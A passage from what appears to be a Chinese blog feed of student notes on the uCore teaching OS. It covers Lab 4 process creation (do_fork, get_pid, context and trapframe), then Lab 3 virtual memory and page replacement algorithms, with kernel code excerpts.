class="built_in">memset</span>(&amp;(proc-&gt;context), <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> context));</span><br><span class="line">        proc-&gt;tf = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;cr3 = boot_cr3;</span><br><span class="line">        proc-&gt;flags = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">memset</span>(proc-&gt;name, <span class="number">0</span>, PROC_NAME_LEN);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> proc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li>请说明proc_struct中<code>struct context context</code>和<code>struct trapframe *tf</code>成员变量含义和在本实验中的作用是什么？<ul><li><p><code>struct context context</code>：储存进程当前状态，用于进程切换中上下文的保存与恢复。</p><p>需要注意的是，与<code>trapframe</code>所保存的用户态上下文不同，context保存的是线程的<strong>当前</strong>上下文。这个上下文可能是执行用户代码时的上下文，也可能是执行内核代码时的上下文。</p></li><li><p><code>struct trapframe* tf</code>：无论是用户程序在用户态通过系统调用进入内核态，还是线程在内核态中被创建，内核态中的线程返回用户态所加载的上下文就是<code>struct trapframe* tf</code>。 所以当一个线程在内核态中建立，则该新线程就必须伪造一个<code>trapframe</code>来返回用户态。</p><blockquote><p>思考一下，从用户态进入内核态会压入当时的用户态上下文<code>trapframe</code>。</p></blockquote></li><li><p>两者关系：以<code>kernel_thread</code>函数为例，尽管该函数设置了<code>proc-&gt;trapframe</code>，但在<code>fork</code>函数中的<code>copy_thread</code>函数里，程序还会设置<code>proc-&gt;context</code>。两个<strong>上下文</strong>看上去好像冗余，但实际上两者所分的工是不一样的。</p><p>进程之间通过进程调度来切换控制权，当某个<code>fork</code>出的新进程获取到了控制流后，首当其中执行的代码是<code>current-&gt;context-&gt;eip</code>所指向的代码，此时新进程仍处于内核态，但实际上我们想在用户态中执行代码，所以我们需要从内核态切换回用户态，也就是中断返回。此时会遇上两个问题：</p><ul><li><strong>新进程如何执行中断返回？</strong> 这就是<code>proc-&gt;context.eip = (uintptr_t)forkret</code>的用处。<code>forkret</code>会使新进程正确的从中断处理例程中返回。</li><li><strong>新进程中断返回至用户代码时的上下文为？</strong> 这就是<code>proc_struct-&gt;tf</code>的用处。中断返回时，新进程会恢复保存的<code>trapframe</code>信息至各个寄存器中，然后开始执行用户代码。</li></ul></li></ul></li></ul><h3 id="2-练习2">2) 练习2</h3><blockquote><p><strong>为新创建的内核线程分配资源</strong></p><p>do_fork的作用是，创建当前内核线程的一个副本，它们的执行上下文、代码、数据都一样，但是存储位置不同。在这个过程中，需要给新内核线程分配资源，并且复制原进程的状态。</p></blockquote><p>实现代码如下，详细信息以注释的形式写到代码中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">do_fork</span><span class="params">(<span class="type">uint32_t</span> clone_flags, <span class="type">uintptr_t</span> stack, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret = -E_NO_FREE_PROC;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="keyword">if</span> (nr_process &gt;= MAX_PROCESS) &#123;</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    &#125;</span><br><span class="line">    ret = -E_NO_MEM;</span><br><span class="line">    <span class="comment">//LAB4:EXERCISE2 YOUR CODE</span></span><br><span class="line">    <span class="comment">// 首先分配一个PCB</span></span><br><span class="line">    <span class="keyword">if</span> ((proc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    <span class="comment">// fork肯定存在父进程，所以设置子进程的父进程</span></span><br><span class="line">    proc-&gt;parent = current;</span><br><span class="line">    <span class="comment">// 分配内核栈</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_kstack</span>(proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_proc;</span><br><span class="line">    <span class="comment">// 将所有虚拟页数据复制过去</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_mm</span>(clone_flags, proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_kstack;</span><br><span class="line">    <span class="comment">// 复制线程的状态，包括寄存器上下文等等</span></span><br><span class="line">    <span class="built_in">copy_thread</span>(proc, stack, tf);</span><br><span class="line">    <span class="comment">// 将子进程的PCB添加进hash list或者list</span></span><br><span class="line">    <span class="comment">// 需要注意的是，不能让中断处理程序打断这一步操作</span></span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc-&gt;pid = <span class="built_in">get_pid</span>();</span><br><span class="line">        <span class="built_in">hash_proc</span>(proc);</span><br><span class="line">        <span class="built_in">list_add</span>(&amp;proc_list, &amp;(proc-&gt;list_link));</span><br><span class="line">        nr_process ++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="comment">// 设置新的子进程可执行</span></span><br><span class="line">    <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">    <span class="comment">// 返回子进程的pid</span></span><br><span class="line">    ret = proc-&gt;pid;</span><br><span class="line"></span><br><span class="line">fork_out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line"></span><br><span class="line">bad_fork_cleanup_kstack:</span><br><span class="line">    <span class="built_in">put_kstack</span>(proc);</span><br><span class="line">bad_fork_cleanup_proc:</span><br><span class="line">    <span class="built_in">kfree</span>(proc);</span><br><span class="line">    <span class="keyword">goto</span> fork_out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>请说明ucore是否做到给每个新fork的线程一个唯一的id？请说明你的分析和理由。</p><blockquote><p><code>get_pid</code>这个函数其实我一开始是没打算研究的，谁知道竟然出成题目了T_T。</p></blockquote><p>uCore中，每个新fork的线程都存在唯一的一个ID，理由如下：</p><ul><li><p>在函数<code>get_pid</code>中，如果静态成员<code>last_pid</code>小于<code>next_safe</code>，则当前分配的<code>last_pid</code>一定是安全的，即唯一的PID。</p></li><li><p>但如果<code>last_pid</code>大于等于<code>next_safe</code>，或者<code>last_pid</code>的值超过<code>MAX_PID</code>，则当前的<code>last_pid</code>就不一定是唯一的PID，此时就需要遍历<code>proc_list</code>，重新对<code>last_pid</code>和<code>next_safe</code>进行设置，为下一次的<code>get_pid</code>调用打下基础。</p></li><li><p>之所以在该函数中维护一个合法的<code>PID</code>的区间，是为了<strong>优化时间效率</strong>。如果简单的暴力搜索，则需要搜索大部分PID和所有的线程，这会使该算法的时间消耗很大，因此使用<code>PID</code>区间来优化算法。</p></li><li><p><code>get_pid</code>代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// get_pid - alloc a unique pid for process</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">get_pid</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">static_assert</span>(MAX_PID &gt; MAX_PROCESS);</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="type">list_entry_t</span> *list = &amp;proc_list, *le;</span><br><span class="line">    <span class="type">static</span> <span class="type">int</span> next_safe = MAX_PID, last_pid = MAX_PID;</span><br><span class="line">    <span class="keyword">if</span> (++ last_pid &gt;= MAX_PID) &#123;</span><br><span class="line">        last_pid = <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">goto</span> inside;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (last_pid &gt;= next_safe) &#123;</span><br><span class="line">    inside:</span><br><span class="line">        next_safe = MAX_PID;</span><br><span class="line">    repeat:</span><br><span class="line">        le = list;</span><br><span class="line">        <span class="keyword">while</span> ((le = <span class="built_in">list_next</span>(le)) != list) &#123;</span><br><span class="line">            proc = <span class="built_in">le2proc</span>(le, list_link);</span><br><span class="line">            <span class="keyword">if</span> (proc-&gt;pid == last_pid) &#123;</span><br><span class="line">                <span class="keyword">if</span> (++ last_pid &gt;= next_safe) &#123;</span><br><span class="line">                    <span class="keyword">if</span> (last_pid &gt;= MAX_PID)</span><br><span class="line">                        last_pid = <span class="number">1</span>;</span><br><span class="line">                    next_safe = MAX_PID;</span><br><span class="line">                    <span class="keyword">goto</span> repeat;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> (proc-&gt;pid &gt; last_pid &amp;&amp; next_safe &gt; proc-&gt;pid)</span><br><span class="line">                next_safe = proc-&gt;pid;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> last_pid;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="3-练习3">3) 练习3</h3><blockquote><p><strong>阅读代码，理解 proc_run 函数和它调用的函数如何完成进程切换的。</strong></p></blockquote><p>请移步<a href="#c-%E5%88%87%E6%8D%A2%E6%B5%81%E7%A8%8B">切换流程</a></p><ul><li>在本实验的执行过程中，创建且运行了几个内核线程？<ul><li>两个内核线程，分别是<code>idleproc</code>和<code>initproc</code>。</li><li>更多关于<code>idleproc</code>和<code>initproc</code>的信息请移步 <a href="#a-%E7%A9%BA%E9%97%B2%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%88%9B%E5%BB%BA">idleproc的创建</a> 和 <a href="#b-%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%86%85%E6%A0%B8%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%88%9B%E5%BB%BA">initproc的创建</a></li></ul></li><li>语句<code>local_intr_save(intr_flag);....local_intr_restore(intr_flag);</code>在这里有何作用?请说明理由。<ul><li>这两句代码的作用分别是<strong>阻塞中断</strong>和<strong>解除中断的阻塞</strong>。</li><li>这两句的配合，使得这两句代码之间的代码块形成<strong>原子操作</strong>，可以使得某些关键的代码不会被打断，从而避免引起一些未预料到的错误，避免条件竞争。</li><li>以进程切换为例，在<code>proc_run</code>中，当刚设置好<code>current</code>指针为下一个进程，但还未完全将控制权转移时，如果该过程突然被一个中断所打断，则中断处理例程的执行可能会引发异常，因为<code>current</code>指针指向的进程与实际使用的进程资源不一致。</li></ul></li></ul><h3 id="4-扩展练习">4) 扩展练习</h3><blockquote><p><strong>实现支持任意大小的内存分配算法</strong></p><p>考虑到现在的slab算法比较复杂，有必要实现一个比较简单的任意大小内存分配算法。可参考本实验中的slab如何调用基于页的内存分配算法来实现first-fit/best-fit/worst-fit/buddy等支持任意大小的内存分配算法。</p></blockquote><blockquote><p>暂鸽，后补。</p></blockquote>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成&lt;code&gt;uCore&lt;/code&gt; Lab 4时写下的一些笔记&lt;/li&gt;
&lt;li&gt;内容涉及进程/线程管理等&lt;/li&gt;
&lt;li&gt;内容较多，建议使用右侧导航栏。&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab3</title>
    <link href="https://kiprey.github.io/2020/08/uCore-3/"/>
    <id>https://kiprey.github.io/2020/08/uCore-3/</id>
    <published>2020-08-12T14:25:53.000Z</published>
    <updated>2025-11-24T03:59:40.150Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里是笔者在完成<code>uCore</code> Lab 3时写下的一些笔记</li><li>内容涉及虚拟内存存储等</li><li>内容较多，建议使用右侧导航栏。</li></ul><span id="more"></span><h2 id="知识点">知识点</h2><h3 id="1-虚拟内存">1. 虚拟内存</h3><ul><li><p>虚拟内存是CPU可以看到的“内存”。</p><ul><li>虚拟内存所对应的实际物理内存单元可能不存在。</li><li>虚拟内存的地址和对应物理内存的地址可能不一致。</li><li>通过操作系统所实现的某种内存映射机制，可以达到访问的虚拟内存地址转换为物理内存地址的目的。</li></ul></li><li><p>当程序访问内存遇上特殊情况时，CPU会执行第十四号中断处理程序——缺页处理程序来处理。</p><ul><li><p>特殊情况有以下两种</p><ul><li><strong>写入</strong>一个<strong>存在物理页</strong>的虚拟页——<strong>写时复制</strong>。</li><li>读写一个不存在物理页的虚拟页——<strong>缺页</strong>。</li><li>不满足访问权限。</li></ul></li><li><p>当程序触发缺页中断时，CPU会把产生异常的线性地址存储在<strong>CR2</strong>寄存器中，并且把<strong>页访问异常错误码</strong>保存在中断栈中。</p><blockquote><p>其中，页访问异常错误码的位0为１表示对应物理页不存在；位１为１表示写异常；位２为１表示访问权限异常。</p></blockquote></li></ul></li><li><p>由于虚拟内存空间比物理内存空间大得多，所以必须在合适的情况下，将不常用的页面调至外存，或者将待用的页面从外存调入内存中。 <strong>这个过程对应用程序无感。</strong> 而什么时候调进调出，选择哪个页面调出，这都是值得考究的，这就是使用页面置换算法的目的。</p></li></ul><h3 id="2-页面置换算法小叙">2. 页面置换算法小叙</h3><blockquote><p>当物理页面不够用时，需要将某个页面置换到外存中。</p><p>那么该置换哪个物理页面呢？这就是页面置换算法的用处。</p></blockquote><h4 id="I-局部页面置换算法">I. 局部页面置换算法</h4><blockquote><p>置换页面的选择范围仅限于当前进程占用的物理页面内.</p></blockquote><h5 id="1-最近最少用算法（LRU）">1) 最近最少用算法（LRU）</h5><h6 id="a-简介">a. 简介</h6><ul><li>思路：选择<strong>最长时间没有被引用</strong>的页面进行置换。</li><li>实现：缺页时，计算内存中每个逻辑页面的上一个访问时间，并选择<strong>上一个使用到当前时间最长</strong>的页面。</li><li>特征：最优置换算法的一种近似。</li></ul><h6 id="b-具体实现">b. 具体实现</h6><ul><li>页面链表<ul><li>系统维护一个按最近一次访问时间排序的页面链表<ul><li>链表首节点是最近刚刚使用过的页面</li><li>链表尾结点是最久未使用的页面</li></ul></li><li>访问内存时，找到相应页面并将其移至链表之首</li><li>缺页时，置换链表尾结点的页面</li></ul></li><li>活动页面栈<ul><li>访问页面时，将此页号压入栈底。并将栈内相同的页号抽出</li><li>缺页时，置换栈底的页面。</li></ul></li></ul><blockquote><p>上述的两种实现都需要维护以及遍历搜索某个数据结构，</p><p>同时LRU对于过去的访问情况统计<strong>过于细致</strong>，所以该方法较为复杂。</p></blockquote><h5 id="2-改进的时钟页面置换算法（Clock）">2) 改进的时钟页面置换算法（Clock）</h5><h6 id="a-简介-2">a. 简介</h6><ul><li>思路：<ul><li>仅对页面的访问情况进行大致统计</li><li>减小修改页的缺页处理开销</li></ul></li><li>数据结构：<ul><li>在页表项中增加访问位，描述页面在过去一段时间的内访问情况。</li><li>在页表项中增加修改位，以判断当前页面是否修改过但没有存入外存。</li><li>各页面组织成环形链表，同时指针指向最先调入的页面。</li></ul></li><li>算法<ul><li>访问页面时，在页表项记录页面访问情况</li><li>缺页时，从指针处开始顺序查找<strong>未被访问与未被修改</strong>的页面进行置换。</li></ul></li><li>特征： 时钟算法是LRU与FIFO的折中。</li></ul><h6 id="b-具体实现-2">b. 具体实现</h6><ul><li>页面装入内存时，访问位初始化为0</li><li>访问页面（读/写）时，访问位置为1</li><li>缺页时，从指针当前位置顺序检查环形链表。<ul><li>若当前遍历到的页面访问位为0，则<strong>置换该页</strong></li><li>若当前遍历到的页面访问位为1，则<strong>设置该页的访问位为0</strong>，并移动指针到下一个页面，直到找到可置换的页面。</li></ul></li></ul><h4 id="II-全局置换算法">II. 全局置换算法</h4><ul><li>思路：全局置换算法为进程分配可变数目的物理页面。</li><li>要解决的问题：<ul><li>进程在不同阶段的内存需求是有变化的。</li><li>分配给进程的内存也需要在不同阶段有所变化。</li><li>全局置换算法需要确定分配给进程的物理页面数。</li></ul></li><li>CPU利用率与并发进程数存在相互制约的关系。<ul><li>进程数少时，提高并发进程数，可提高CPU利用效率。</li><li>并发进程导致内存访问增加</li><li>并发进程的内存访问会降低了访存的局部性特征。</li><li>局部性特征的下降会导致缺页率上升和CPU利用率下降。</li></ul></li></ul><h5 id="1-工作集置换算法">1) 工作集置换算法</h5><h6 id="a-工作集与常驻集">a. 工作集与常驻集</h6><ul><li><strong>工作集</strong>是一个进程当前正在使用的<strong>逻辑页面</strong>集合，可表示为二元函数$W(t, \Delta)$<ul><li>$t$是当前的执行时刻</li><li>$\Delta$ 称为<strong>工作集窗口</strong>(working-set window)，即一个定长的页面访问时间的窗口。</li><li>$W(t, \Delta)$指在当前时刻$t$前的$\Delta$时间窗口中的<strong>所有访问页面</strong>所组成的集合。</li><li>$|W(t, \Delta)|$指工作集的大小，即页面数目。</li></ul></li><li><strong>常驻集</strong>是当前时刻进程<strong>实际驻留</strong>在内存中的页面集合。</li><li>工作集与常驻集的关系<ul><li>工作集是进程在运行过程中固有的性质</li><li>常驻集取决于系统分配给进程的物理页面数目和页面置换算法。</li></ul></li></ul><h6 id="b-思路">b. 思路</h6><ul><li><p>当前时刻前$\tau$个内存访问的页引用是工作集。其中$\tau$被称为<strong>窗口大小</strong>。</p></li><li><p>换出不在工作集中的页面</p></li></ul><h6 id="c-具体实现">c. 具体实现</h6><ul><li>访存链表：维护窗口内的访存页面</li><li><strong>访存时，换出不在工作集的页面；</strong> 更新访存链表。</li><li>缺页时，换入页面，更新访存链表。</li></ul><h5 id="2-缺页率置换算法（PPF）">2) 缺页率置换算法（PPF）</h5><h6 id="a-简介-3">a. 简介</h6><p>通过调节常驻集大小，使每个进程的缺页率保持在一个合理的范围内。</p><ul><li>若进程缺页率过高，则增加常驻集以分配更多的物理内存</li><li>若进程缺页率过低，则减小常驻集以减小它的物理页面数。</li></ul><h6 id="b-具体实现-3">b. 具体实现</h6><ul><li>访存时，设置引用位标志</li><li>缺页时，计算从上次缺页时间$t_{last}$到现在$t_{current}$的时间间隔<ul><li>如果$t_{current}-t_{last}&gt;T$，则置换所有在$[t_{last}, t_{current}]$时间内<strong>没有被引用</strong>的页。</li><li>如果$t_{current}-t_{last}&lt;T$，则增加缺失页到常驻集中。</li></ul></li></ul><h4 id="III-Belady现象">III. Belady现象</h4><ul><li>现象： 采用FIFO等算法时，可能出现分配的物理页面数增加，缺页次数反而升高的异常情况。</li><li>原因：<ul><li>FIFO算法的置换特征与进程访问内存的动态特征矛盾</li><li>被置换出去的页面并不一定是进程近期不会访问的。</li></ul></li></ul><h3 id="3-uCore虚拟内存机制的实现">3. uCore虚拟内存机制的实现</h3><h4 id="I-虚拟内存管理">I. 虚拟内存管理</h4><ul><li><p>结构体变量<code>check_mm_struct</code>用于管理虚拟内存页面，其结构体如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// the control struct for a set of vma using the same PDT</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">mm_struct</span> &#123;</span><br><span class="line">    <span class="type">list_entry_t</span> mmap_list;        <span class="comment">// 按照虚拟地址顺序双向连接的虚拟页链表</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">vma_struct</span> *mmap_cache; <span class="comment">// 当前使用的虚拟页地址，该成员加速页索引速度。</span></span><br><span class="line">    <span class="type">pde_t</span> *pgdir;                  <span class="comment">// 虚拟页对应的PDT</span></span><br><span class="line">    <span class="type">int</span> map_count;                 <span class="comment">// 虚拟页个数</span></span><br><span class="line">    <span class="type">void</span> *sm_priv;                 <span class="comment">// 用于指向swap manager的某个链表,在FIFO算法中，该双向链表用于将可交换的已分配物理页串起来</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>当分配出新的虚拟页时，程序会执行<code>insert_vma_struct</code>函数，此时虚拟页<code>vma_struct</code>就会被插入<code>mm_struct::mmap_list</code>双向链表中。</p></li><li><p>若程序首次访问该内存而触发缺页中断时，程序会在缺页处理程序中为该虚拟页划分出一块新的物理页。同时，还会更新<code>mm_struct::pgdir</code>上的对应页表条目，之后该页的内存访问即可正常执行。</p></li><li><p>在FIFO页面置换算法中，初始时，<code>mm_struct</code>中的<code>sm_priv</code>会被设置为<code>pra_list_head</code>。而<code>pra_list_head</code>是一个双向链表的起始结点，该双向链表用于将<strong>可交换的已分配物理页</strong>串起来。</p></li></ul><h4 id="II-页面置换">II. 页面置换</h4><ul><li><p><code>swap_manager</code>与<code>pmm_manager</code>类似，都设置了一个用于管理某个功能的模块。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">swap_manager</span></span><br><span class="line">&#123;</span><br><span class="line">     <span class="type">const</span> <span class="type">char</span> *name;</span><br><span class="line">     <span class="comment">/* Global initialization for the swap manager */</span></span><br><span class="line">     <span class="built_in">int</span> (*init)            (<span class="type">void</span>);</span><br><span class="line">     <span class="comment">/* Initialize the priv data inside mm_struct */</span></span><br><span class="line">     <span class="built_in">int</span> (*init_mm)         (<span class="keyword">struct</span> mm_struct *mm);</span><br><span class="line">     <span class="comment">/* Called when tick interrupt occured */</span></span><br><span class="line">     <span class="built_in">int</span> (*tick_event)      (<span class="keyword">struct</span> mm_struct *mm);</span><br><span class="line">     <span class="comment">/* Called when map a swappable page into the mm_struct */</span></span><br><span class="line">     <span class="built_in">int</span> (*map_swappable)   (<span class="keyword">struct</span> mm_struct *mm, <span class="type">uintptr_t</span> addr, <span class="keyword">struct</span> Page *page, <span class="type">int</span> swap_in);</span><br><span class="line">     <span class="comment">/* When a page is marked as shared, this routine is called to</span></span><br><span class="line"><span class="comment">      * delete the addr entry from the swap manager */</span></span><br><span class="line">     <span class="built_in">int</span> (*set_unswappable) (<span class="keyword">struct</span> mm_struct *mm, <span class="type">uintptr_t</span> addr);</span><br><span class="line">     <span class="comment">/* Try to swap out a page, return then victim */</span></span><br><span class="line">     <span class="built_in">int</span> (*swap_out_victim) (<span class="keyword">struct</span> mm_struct *mm, <span class="keyword">struct</span> Page **ptr_page, <span class="type">int</span> in_tick);</span><br><span class="line">     <span class="comment">/* check the page relpacement algorithm */</span></span><br><span class="line">     <span class="built_in">int</span> (*check_swap)(<span class="type">void</span>);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>若使用FIFO页面置换算法，则在缺页中断程序中，程序只会<strong>换入</strong>目标物理页，而不会主动换出。</p><p>只有在分配空闲物理页时，若<code>pmm_manager-&gt;alloc_pages(n)</code>失败，则程序才会执行一次页面换出，以腾出空闲的物理页，并重新分配。</p></li><li><p><code>swap_in</code>函数只会将目标物理页加载进内存中，而不会修改页表条目。所以相关的标志位设置必须在<code>swap_in</code>函数的外部手动处理。而<code>swap_out</code>函数会先执行<code>swap_out_victim</code>，找出最适合换出的物理页，并将其换出，最后刷新TLB。需要注意的是<code>swap_out</code>函数会在函数内部设置PTE，当某个页面被换出后，PTE会被设置为所换出物理页在硬盘上的偏移。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cprintf</span>(<span class="string">&quot;swap_out: i %d, store page in vaddr 0x%x to disk swap entry %d\n&quot;</span>, i, v, page-&gt;pra_vaddr/PGSIZE<span class="number">+1</span>);</span><br><span class="line">*ptep = (page-&gt;pra_vaddr/PGSIZE<span class="number">+1</span>)&lt;&lt;<span class="number">8</span>;</span><br><span class="line"><span class="built_in">free_page</span>(page);</span><br></pre></td></tr></table></figure><p>当PTE所对应的物理页存在于内存中，那么该PTE就是正常的页表条目，可被CPU直接寻址用于转换地址。但当所对应的物理页不在内存时，该PTE就成为<code>swap_entry_t</code>，保存该物理页数据在外存的偏移位置。相关代码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * swap_entry_t</span></span><br><span class="line"><span class="comment"> * --------------------------------------------</span></span><br><span class="line"><span class="comment"> * |         offset        |   reserved   | 0 |</span></span><br><span class="line"><span class="comment"> * --------------------------------------------</span></span><br><span class="line"><span class="comment"> *           24 bits            7 bits    1 bit</span></span><br><span class="line"><span class="comment"> * /</span></span><br><span class="line"><span class="comment"> /* *</span></span><br><span class="line"><span class="comment"> * swap_offset - takes a swap_entry (saved in pte), and returns</span></span><br><span class="line"><span class="comment"> * the corresponding offset in swap mem_map.</span></span><br><span class="line"><span class="comment"> * */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> swap_offset(entry) (&#123;                                       \</span></span><br><span class="line"><span class="meta">               size_t __offset = (entry &gt;&gt; 8);                        \</span></span><br><span class="line"><span class="meta">               <span class="keyword">if</span> (!(__offset &gt; 0 &amp;&amp; __offset &lt; max_swap_offset)) &#123;    \</span></span><br><span class="line"><span class="meta">                    panic(<span class="string">&quot;invalid swap_entry_t = %08x.\n&quot;</span>, entry);    \</span></span><br><span class="line"><span class="meta">               &#125;                                                    \</span></span><br><span class="line"><span class="meta">               __offset;                                            \</span></span><br><span class="line"><span class="meta">          &#125;)</span></span><br></pre></td></tr></table></figure></li><li><p>同时，不是所有物理页面都可以置换，例如内核关键代码和数据等等，所以在分配物理页时，需要对于那些可被置换的物理页执行<code>swap_map_swappable</code>函数，将该物理页加入到<code>mm_struct::sm_priv</code>指针所指向的双向链表中，换入和换出操作都会操作该链表（插入/移除<strong>可交换的已分配</strong>物理页）。</p></li><li><p>数据结构<code>Page</code>和<code>vma_struct</code>分别用于管理物理页和虚拟页，其结构如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 用于描述某个虚拟页的结构</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">vma_struct</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *vm_mm; <span class="comment">// 管理该虚拟页的mm_struct</span></span><br><span class="line">    <span class="type">uintptr_t</span> vm_start;      <span class="comment">// 虚拟页起始地址，包括当前地址  </span></span><br><span class="line">    <span class="type">uintptr_t</span> vm_end;        <span class="comment">// 虚拟页终止地址，不包括当前地址（地址前闭后开）  </span></span><br><span 